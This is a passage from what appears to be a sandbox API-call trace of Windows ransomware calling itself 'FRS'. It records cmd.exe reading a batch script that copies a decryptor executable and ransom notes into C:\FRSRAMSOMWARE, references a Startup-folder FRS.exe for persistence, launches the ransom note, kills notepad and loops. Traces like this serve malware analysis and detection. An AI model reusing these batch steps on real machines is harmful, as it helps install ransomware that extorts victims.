| out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0075.912] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.912] GetFileType (hFile=0x34c) returned 0x1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0075.912] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0075.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0075.912] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.912] GetFileType (hFile=0x34c) returned 0x1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0075.912] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0075.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0075.912] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.912] GetFileType (hFile=0x34c) returned 0x1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0075.912] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0075.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0075.912] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.912] GetFileType (hFile=0x34c) returned 0x1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0075.912] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0075.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0075.912] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0075.912] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.913] GetFileType (hFile=0x34c) returned 0x1 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0075.913] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0075.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0075.913] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.913] GetFileType (hFile=0x34c) returned 0x1 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0075.913] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0075.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0075.913] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.913] GetFileType (hFile=0x34c) returned 0x1 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0075.913] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0075.913] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0075.913] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0075.913] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.914] GetFileType (hFile=0x34c) returned 0x1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0075.914] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0075.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0075.914] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.914] GetFileType (hFile=0x34c) returned 0x1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0075.914] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0075.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0075.914] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.914] GetFileType (hFile=0x34c) returned 0x1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0075.914] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0075.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0075.914] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.914] GetFileType (hFile=0x34c) returned 0x1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0075.914] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0075.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0075.914] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.914] GetFileType (hFile=0x34c) returned 0x1 [0075.914] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0075.915] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0075.915] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0075.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0075.915] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0075.915] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.915] GetFileType (hFile=0x34c) returned 0x1 [0075.915] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0075.915] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0075.915] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0075.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0075.915] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0075.915] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.915] GetFileType (hFile=0x34c) returned 0x1 [0075.915] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0075.915] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0075.915] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0075.915] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0075.915] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0075.916] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.916] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0075.916] _get_osfhandle (_FileHandle=0) returned 0x24 [0075.916] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0075.917] SetConsoleInputExeNameW () returned 0x1 [0075.917] GetConsoleOutputCP () returned 0x1b5 [0075.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0075.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.917] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x34c [0075.917] _open_osfhandle (_OSFileHandle=0x34c, _Flags=8) returned 3 [0075.917] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.917] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0075.917] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0075.917] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0075.917] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0075.917] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0075.917] GetFileType (hFile=0x34c) returned 0x1 [0075.917] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.917] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0075.917] _tell (_FileHandle=3) returned 2512 [0075.917] _close (_FileHandle=3) returned 0 [0075.918] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0075.918] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0075.918] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0075.918] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0075.918] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0075.918] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0075.918] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0075.918] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0075.918] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0075.918] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0075.918] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0075.918] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0075.918] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0075.918] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0075.918] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0075.918] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0075.918] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0075.918] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0075.918] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0075.918] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0075.918] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0075.918] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0075.918] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0075.918] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0075.918] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0075.918] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0075.918] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0075.918] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0075.918] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0075.918] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0075.918] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0075.918] _wcsicmp (_String1="ping", _String2="START") returned -3 [0075.918] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0075.918] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0075.918] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0075.918] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0075.918] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0075.918] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0075.918] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0075.918] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0075.918] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0075.918] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0075.918] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0075.918] SetErrorMode (uMode=0x0) returned 0x0 [0075.918] SetErrorMode (uMode=0x1) returned 0x0 [0075.918] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0075.918] SetErrorMode (uMode=0x0) returned 0x1 [0075.918] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0075.918] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0075.918] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0075.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.919] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0075.919] GetLastError () returned 0x2 [0075.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.919] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0075.919] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0075.919] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0075.919] GetLastError () returned 0x2 [0075.919] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0075.919] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0075.919] GetFileType (hFile=0x28) returned 0x2 [0075.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0075.919] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8efb4 | out: lpMode=0xc8efb4) returned 1 [0075.919] _dup (_FileHandle=1) returned 3 [0075.919] _close (_FileHandle=1) returned 0 [0075.919] _wcsicmp (_String1="nul", _String2="con") returned 11 [0075.919] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0075.920] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0075.920] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0075.920] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0075.920] SetErrorMode (uMode=0x0) returned 0x0 [0075.920] SetErrorMode (uMode=0x1) returned 0x0 [0075.920] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0075.920] SetErrorMode (uMode=0x0) returned 0x1 [0075.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0075.920] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0075.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0075.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0075.920] GetLastError () returned 0x2 [0075.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59af0 [0075.920] FindClose (in: hFindFile=0xd59af0 | out: hFindFile=0xd59af0) returned 1 [0075.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff 